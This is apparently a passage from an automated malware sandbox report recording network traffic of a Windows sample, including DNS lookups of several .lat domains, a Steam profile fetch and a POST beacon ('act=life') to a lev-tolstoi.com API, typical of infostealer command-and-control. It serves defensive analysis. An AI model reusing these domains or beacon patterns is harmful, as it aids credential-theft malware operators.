                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:27.429949999 CET49718443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:27.430094004 CET49718443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:27.430119991 CET44349718104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:28.384623051 CET44349718104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:28.384891987 CET44349718104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:28.385006905 CET49718443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:28.385298967 CET49718443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:28.385318995 CET44349718104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:28.535083055 CET49724443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:28.535145998 CET44349724104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:28.535259008 CET49724443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:28.535623074 CET49724443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:28.535635948 CET44349724104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:29.756100893 CET44349724104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:29.758272886 CET49724443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:29.758272886 CET49724443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:29.758291960 CET44349724104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:29.758538961 CET44349724104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:29.760260105 CET49724443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:29.760260105 CET49724443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:29.760283947 CET44349724104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:29.762501955 CET49724443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:29.807363987 CET44349724104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:30.578219891 CET44349724104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:30.578443050 CET44349724104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:30.578516006 CET49724443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:30.578615904 CET49724443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:30.578634024 CET44349724104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:31.023097038 CET49730443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:31.023144960 CET44349730104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:31.023230076 CET49730443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:31.023624897 CET49730443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:31.023643970 CET44349730104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:32.243804932 CET44349730104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:32.243896961 CET49730443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:32.245965958 CET49730443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:32.245974064 CET44349730104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:32.246242046 CET44349730104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:32.248202085 CET49730443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:32.248456955 CET49730443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:32.248497009 CET44349730104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:32.248603106 CET49730443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:32.248631954 CET44349730104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:33.178978920 CET44349730104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:33.179075956 CET44349730104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:33.179218054 CET49730443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:33.179667950 CET49730443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:33.179707050 CET44349730104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:33.753921986 CET49740443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:33.753973007 CET44349740104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:33.754060030 CET49740443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:33.754458904 CET49740443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:33.754487991 CET44349740104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:34.964989901 CET44349740104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:34.965087891 CET49740443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:34.966640949 CET49740443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:34.966650963 CET44349740104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:34.966943026 CET44349740104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:34.968272924 CET49740443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:34.968374968 CET49740443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:34.968381882 CET44349740104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:35.732198954 CET44349740104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:35.732300043 CET44349740104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:35.732377052 CET49740443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:35.761281013 CET49740443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:35.761307001 CET44349740104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:36.323563099 CET49747443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:36.323628902 CET44349747104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:36.323733091 CET49747443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:36.324120998 CET49747443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:36.324140072 CET44349747104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:37.537800074 CET44349747104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:37.537904024 CET49747443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:37.539603949 CET49747443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:37.539616108 CET44349747104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:37.539871931 CET44349747104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:37.550503969 CET49747443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:37.551521063 CET49747443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:37.551558018 CET44349747104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:37.551748991 CET49747443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:37.551774979 CET44349747104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:37.551892996 CET49747443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:37.551928997 CET44349747104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:37.552063942 CET49747443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:37.552099943 CET44349747104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:37.552243948 CET49747443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:37.552274942 CET44349747104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:37.552501917 CET49747443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:37.552530050 CET44349747104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:37.552542925 CET49747443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:37.552553892 CET44349747104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:37.552716017 CET49747443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:37.552746058 CET44349747104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:37.552759886 CET49747443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:37.552805901 CET49747443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:37.552908897 CET49747443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:37.552939892 CET49747443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:37.595367908 CET44349747104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:37.595644951 CET49747443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:37.595726967 CET44349747104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:37.595767975 CET49747443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:37.595812082 CET44349747104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:37.595917940 CET49747443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:37.595969915 CET44349747104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:40.790339947 CET44349747104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:40.790461063 CET44349747104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:40.790559053 CET49747443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:40.790967941 CET49747443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:40.790990114 CET44349747104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:40.854381084 CET49758443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:40.854440928 CET44349758104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:40.854518890 CET49758443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:40.854907990 CET49758443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:40.854921103 CET44349758104.21.66.86192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:41.398205042 CET49758443192.168.2.6104.21.66.86

                                                                                                                                                                                                                                                                  UDP Packets

                                                                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:17.454637051 CET5083653192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:17.593065977 CET53508361.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:17.648936033 CET5818553192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:17.898864031 CET53581851.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:17.944612980 CET5279853192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:18.081825018 CET53527981.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:18.086991072 CET6313753192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:18.224515915 CET53631371.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:18.228583097 CET5910353192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:18.369600058 CET53591031.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:18.373558998 CET6390653192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:18.512569904 CET53639061.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:18.514270067 CET5207753192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:18.651985884 CET53520771.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:18.656111002 CET5996753192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:18.794179916 CET53599671.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:18.796359062 CET6282753192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:18.934283018 CET53628271.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:18.936224937 CET5794953192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:19.072911024 CET53579491.1.1.1192.168.2.6
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:21.630225897 CET6391853192.168.2.61.1.1.1
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:21.766988039 CET53639181.1.1.1192.168.2.6

                                                                                                                                                                                                                                                                  DNS Queries

                                                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:17.454637051 CET192.168.2.61.1.1.10x4177Standard query (0)sweepyribs.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:17.648936033 CET192.168.2.61.1.1.10x6622Standard query (0)grannyejh.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:17.944612980 CET192.168.2.61.1.1.10xb564Standard query (0)discokeyus.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:18.086991072 CET192.168.2.61.1.1.10x4140Standard query (0)necklacebudi.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:18.228583097 CET192.168.2.61.1.1.10xf01bStandard query (0)energyaffai.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:18.373558998 CET192.168.2.61.1.1.10xbe33Standard query (0)aspecteirs.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:18.514270067 CET192.168.2.61.1.1.10xc639Standard query (0)sustainskelet.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:18.656111002 CET192.168.2.61.1.1.10x1f32Standard query (0)crosshuaht.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:18.796359062 CET192.168.2.61.1.1.10x9061Standard query (0)rapeflowwj.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:18.936224937 CET192.168.2.61.1.1.10xd087Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:21.630225897 CET192.168.2.61.1.1.10xf0e0Standard query (0)lev-tolstoi.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                  DNS Answers

                                                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:17.593065977 CET1.1.1.1192.168.2.60x4177Name error (3)sweepyribs.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:17.898864031 CET1.1.1.1192.168.2.60x6622Name error (3)grannyejh.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:18.081825018 CET1.1.1.1192.168.2.60xb564Name error (3)discokeyus.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:18.224515915 CET1.1.1.1192.168.2.60x4140Name error (3)necklacebudi.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:18.369600058 CET1.1.1.1192.168.2.60xf01bName error (3)energyaffai.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:18.512569904 CET1.1.1.1192.168.2.60xbe33Name error (3)aspecteirs.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:18.651985884 CET1.1.1.1192.168.2.60xc639Name error (3)sustainskelet.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:18.794179916 CET1.1.1.1192.168.2.60x1f32Name error (3)crosshuaht.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:18.934283018 CET1.1.1.1192.168.2.60x9061Name error (3)rapeflowwj.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:19.072911024 CET1.1.1.1192.168.2.60xd087No error (0)steamcommunity.com23.55.153.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:21.766988039 CET1.1.1.1192.168.2.60xf0e0No error (0)lev-tolstoi.com104.21.66.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                  Dec 23, 2024 07:09:21.766988039 CET1.1.1.1192.168.2.60xf0e0No error (0)lev-tolstoi.com172.67.157.254A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                                                                                                                                  • steamcommunity.com
                                                                                                                                                                                                                                                                  • lev-tolstoi.com

                                                                                                                                                                                                                                                                  HTTPS Proxied Packets

                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  0192.168.2.64970723.55.153.1064436480C:\Users\user\Desktop\tPSrcPbmRe.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-12-23 06:09:20 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Host: steamcommunity.com
                                                                                                                                                                                                                                                                  2024-12-23 06:09:21 UTC1905INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                  Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                                                                  Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 06:09:21 GMT
                                                                                                                                                                                                                                                                  Content-Length: 35121
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Set-Cookie: sessionid=16848c626f92fe879f895702; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                                                  Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                  2024-12-23 06:09:21 UTC14479INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                                                                                                                                                                                                  Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                                                                                                                                                                                                                  2024-12-23 06:09:21 UTC10097INData Raw: 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f 52 54 09
                                                                                                                                                                                                                                                                  Data Ascii: .com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT
                                                                                                                                                                                                                                                                  2024-12-23 06:09:21 UTC10545INData Raw: 4e 49 56 45 52 53 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 70 75 62 6c 69 63 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4c 41 4e 47 55 41 47 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 65 6e 67 6c 69 73 68 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 55 4e 54 52 59 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 55 53 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 43 4f 4d 4d 55 4e 49 54 59 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 66 61 73 74 6c 79 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74
                                                                                                                                                                                                                                                                  Data Ascii: NIVERSE&quot;:&quot;public&quot;,&quot;LANGUAGE&quot;:&quot;english&quot;,&quot;COUNTRY&quot;:&quot;US&quot;,&quot;MEDIA_CDN_COMMUNITY_URL&quot;:&quot;https:\/\/cdn.fastly.steamstatic.com\/steamcommunity\/public\/&quot;,&quot;MEDIA_CDN_URL&quot;:&quot;htt


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  1192.168.2.649710104.21.66.864436480C:\Users\user\Desktop\tPSrcPbmRe.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-12-23 06:09:22 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Content-Length: 8
                                                                                                                                                                                                                                                                  Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                  2024-12-23 06:09:22 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                                  Data Ascii: act=life
                                                                                                                                                                                                                                                                  2024-12-23 06:09:23 UTC1119INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 06:09:23 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Set-Cookie: PHPSESSID=43i6ulevmtcmcgks3d3bndp76k; expires=Thu, 17 Apr 2025 23:56:02 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                  vary: accept-encoding
